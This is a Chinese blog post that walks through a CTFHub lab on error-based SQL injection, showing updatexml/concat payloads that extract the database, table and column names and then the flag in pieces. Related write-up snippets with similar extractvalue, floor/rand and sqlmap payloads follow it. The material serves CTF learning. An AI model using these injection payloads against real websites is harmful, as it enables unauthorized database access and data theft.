CTFHub - 报错注入

已于 2023-11-03 17:46:34 修改
阅读量904 收藏 3
点赞数 6
分类专栏: CTFHub 文章标签: 网络安全 web安全 sql
于 2023-09-09 11:33:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/have_a_great_day/article/details/132768347
版权

目录

1. 报错注入

2. 注入流程

2.1 初始界面

2.2 判断注入类型

2.3 获取数据库 库名称

2.4 判断数据表 表名称

2.5 判断数据列 列名称

2.6 获取数据

         欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。

1. 报错注入

        在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。

        报错注入的原理,在错误信息中执行SQL 语句。触发报错的方式有很多,具体细节也不尽相同。
        报错注入手法多达20种,其中最常用的命令有:updatexml(好记)、 extractvalue、group by等。

2. 注入流程

2.1 初始界面

2.2 判断注入类型

        具体图和判断注入类型请查看CTFHub - 字符型注入文章。

        通道:CTFHub - 字符型注入_netsecurity_Zeus的博客-CSDN博客

        根据报错信息回显内容,可以看到报错信息内并未带有1 ,所以此处是 数字型注入。

        细说:第一个和第三个 ' 是数据库自带的符号,中间被扩住的是输入的内容,报错内容只是把单引号 ' 进行扩住,说明 ' 前的内容都没有问题,所以是数字型注入。

        闭合方式:在报错信息中,将输入的内容 1' 不看,剩下的 ' 为此数据库的闭合方式。

2.3 获取数据库 库名称

        concat(X,X,X) --- 链接合并字符串,存在三个参数。该命令不会对输入文件进行任何修改或排序,只会简单地将它们按照指定的顺序连接在一起。

        updatexml --- 报错注入里其中一种方法,存在三个参数。

        【~】 ---十六进制--> 【0x7e】,此处也可以用别的十六进制数,最好使用符号,避免和数据库名称搞混。

1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) #


~ ---十六进制---> 0x7e

2.4 判断数据表 表名称

        正常流程来获取表名称,因为报错信息只能一行一行进行回显,所以此处发现回显内容为:不止一行表。所以需要让报错信息一行一行进行回显。

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables),0x7e),1) #

上面的命令没有加限制条件,各位大佬看到这一步,可以尝试下面的命令

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),0x7e),1) #

        统计该数据库内共有多少张表。

        count(*) --- SQL查询语句中的聚合函数,用于计算指定表中的数量,不考虑具体的列值,只关注行数。

        可以看到该数据库中一共有161 张表,数量之多,难以想象。 
1 and updatexml(1,concat(0x7e,(select count(*) from information_schema.tables),0x7e),1) #

        此处,尝试了一下能不能一次性将表全部回显。结果是不能的,回显得长度有限。

        concat(0x7e, ,0x7e) --- 回显出的信息应该是【~内容~】。

        如下图,回显出的信息右部分并没有【~】符号。所以肯定是长度受限制了。那我们就需要一张一张进行回显。

1 and updatexml(1,concat(0x7e,(select group_coucat(table_name) from information_schema.tables),0x7e),1) #

        输出第一张表

        limit X,Y --- X:偏移量        Y:行数

        注:偏移量X是从0 开始计算的。

        例:limit 20,10 --- 获取第21 到30 的记录。

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 0,1),0x7e),1) #

        输出第二张表

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 1,1),0x7e),1) #

        输出flag 表,此处表太多了,我们已知flag 在倒数第二张,节省时间就直接获取了。

        如果在真实环境里,可能要一张一张获取了。目前小白我不知道有没有其他快捷办法。

1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables limit 159,1),0x7e),1) #

2.5 判断数据列 列名称

1 and updatexml (1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='flag'),0x7e),1) #

2.6 获取数据

1 and updatexml(1,concat(0x7e,(select flag from flag),0x7e),1) #

   

        获取该数据的长度。

        该数据一共有32 位。

        length() --- 常用于获取字符串的长度,用于验证字符串的有效性,计算字符个数以及进行字符串比较等操作。

1 and updatexml(1,concat(0x7e,(select length(flag) from flag),0x7e),1) #

        因为无法一次性将数据全部回显,所以需要截取位数,分步获取。

        将两次的数据拼凑在一起,就是整个flag 的内容。

        substr(string,start,length)
        string --- 提取字符串的源字符串。
        start --- 子字符串的起始位置,它可以是一个正整数或负整数。对于正整数,表示从左向右的偏移量,其中第一个字符的位置为1;对于负整数,表示从右向左的偏移量,其中最后一个字符的位置为-1。
        length --- 提取的子字符串的长度,是一个可选参数。如果指定了长度,将从起始位置开始提取指定长度的子字符串;如果未指定长度,则将提取从起始位置到字符串末尾的所有字符。 
1 and updatexml(1,concat(0x7e,(select substr(flag,1,16) from flag),0x7e),1) #
1 and updatexml(1,concat(0x7e,(select substr(flag,17,32) from flag),0x7e),1) #

懒羊羊安全
关注
专栏目录
[ctf web]sql报错注入
qq_37301470的博客
11-12 327
报错注入 一: exp,pow溢出报错 exp(int) 返回e的x次方 exp(~(select * from (select user())a)) ~:取反运算符 将字符串处理后变为大整数,报错 exp(710):报错 exp(709):不报错 绕过if,case的过滤进行基于报错的布尔盲注。 pow(int,int) 返回x的y次方 数值过大报错 pow(1+(sql表达式),99999999999999) 若sql语句为假则不报错 为真则报错 二:XML和Xpath基础 XML:标记
CTFHUB-web-SQL注入
ookami6497的博客
11-29 866
CTFHUB SQL
CTFHub | 报错注入
尼泊罗河伯的博客
10-28 2667
因为报错注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此题 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
ctfhub-报错注入
m0_62094846的博客
12-22 459
查找库名 1 and extractvalue(1,concat(0x7e,database(),0x7e)) 查找表名 1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) 查找字段 1 and extractvalue(1,concat(0x7e,(select gr..
mysql报错注入ctf_ctfhub技能树—sql注入—报错注入
weixin_29350039的博客
01-27 210
打开靶机 payload1 Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x;payload拆分讲解1 count():count()函数返回匹配指定条件的行数。count(*)函数返回表中的记录数2 floor():floor:函数是用来向下...
CTFHub报错注入
sGanYu
07-24 1898
手动注入 发现无论输入什么,都只会回显成功或者错误 可以根据updatexml的报错注入来获取信息 updatexml (string, xpath_string, string) 第一个参数:可以输入1,为XML文档对象的名称 第二个参数:xpath_string ,提取多个子节点的文本 第三个参数:可以输入1,替换查找的符合条件的参数 0x7e是一个代表~的十六进制,可以用’%’,或者’~’来代替 查询出两个表,一个为news一个为flag,这里也可以把'sqli'换成database
CTFHUB(WEB) 报错注入
qq_54929891的博客
09-17 375
在经历了整数型注入和数字注入后自信满满的打开了报错注入,结果不回显正确内容,只回显正确或错误的情况让我无从下手,没办法,身为小白只能继续去找资料学习一下如何做这种题目了 学了一会儿,发现有很多办法,但我学的是最简单的一种办法,其他办法以后在实践中慢慢的学习 这个方法利用的是count(),rand(),floor(),group by()这几个函数的组合来利用报错信息出来我们需要查询的内容 count():返回匹配指定条件的行数。count(*)返回表中的记录数(不添加的话会出现列不对应的情况,可以试
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
最新发布
2301_80162151的博客
03-01 843
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1269
CTFHUB-WEB-SQL注入
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7351
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 471
个人CTF学习之路
CTFHub 报错注入
weixin_44732566的博客
02-20 4275
CTFHub 报错注入 当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误。 ...
CTFHUB-报错注入
Web学习之路
03-21 271
理解
CTFHub-报错注入
m0_51589948的博客
05-19 214
报错注入 .在输入1后发现没有获取任何有关数据库的信息,暂时判断为报错注入 然后使用updatexml的语法尝试进行报错注入 -1 union select updatexml(1,(0x7e,(select database()),0x7e),1) 得到库名为sqli 得出信息,可判断为报错注入,继续查询表名 -1 union select updatexml(1,concat(07xe,(select(group_concat(table_name))from information_s
CTFHUB-SQL注入-报错注入
m0_64180167的博客
11-29 917
报错注入是在网站提供查询时进行SQL注入在用户输入了错误的信息时 网站进行报错处理但是提交的不进行审查 就会让代码随着报错指令进入目录。
CTFhub 报错注入
plant1234的博客
06-16 252
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
CTFHub笔记之技能树-web报错注入
weixin_48799157的博客
03-19 447
小白一个,如有错误请指正! 对这方面不是很熟悉,补了一下知识点: https://blog.csdn.net/silence1_/article/details/90812612https://blog.csdn.net/silence1_/article/details/90812612 解法一: 1.用extractvalue()函数爆数据库 select * from news where id=1 and (select extractvalue(1,concat(0x7e,(select
CTFHUB-WEB-SQL注入-报错注入
weixin_43486981的博客
08-10 788
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 题目: 靶机环境:输入1时,显示正确 输入一个随意的字符串后,显示错误。 求数据库名:输入1 union select updatexml(1,concat(0x7e,database(),0x7e),1);,页面报错: 求表名:输入1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information
CTF-报错注入
黎先生的博客
10-20 874
1. mysql 之count(*)原理 select count(*) from table group by floor(rand()*2); sql表:table id value 0 1 0 1 1 1 2 2 2 2 3 2 查询前mysql会建议一个虚拟表,查询表中第一行数据时,会insert floor(rand()*2),假如是0,查询虚拟...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值